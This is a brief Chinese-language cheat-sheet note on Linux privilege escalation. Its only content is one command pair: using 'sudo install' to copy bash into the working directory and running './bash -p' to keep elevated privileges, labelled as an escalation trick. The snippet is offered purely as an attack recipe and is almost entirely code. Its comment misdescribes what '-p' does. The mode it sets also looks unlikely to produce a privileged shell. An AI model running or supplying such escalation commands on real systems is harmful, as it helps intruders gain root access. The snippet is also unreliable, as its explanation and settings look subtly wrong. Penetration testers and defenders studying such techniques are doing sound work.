# 【Linux】【提權】相關指令

Sudo install

```shell
# 
# ./bash -p => -p:  載入下環境變數
sudo install -m 755 $(which bash) . 
./bash -p
```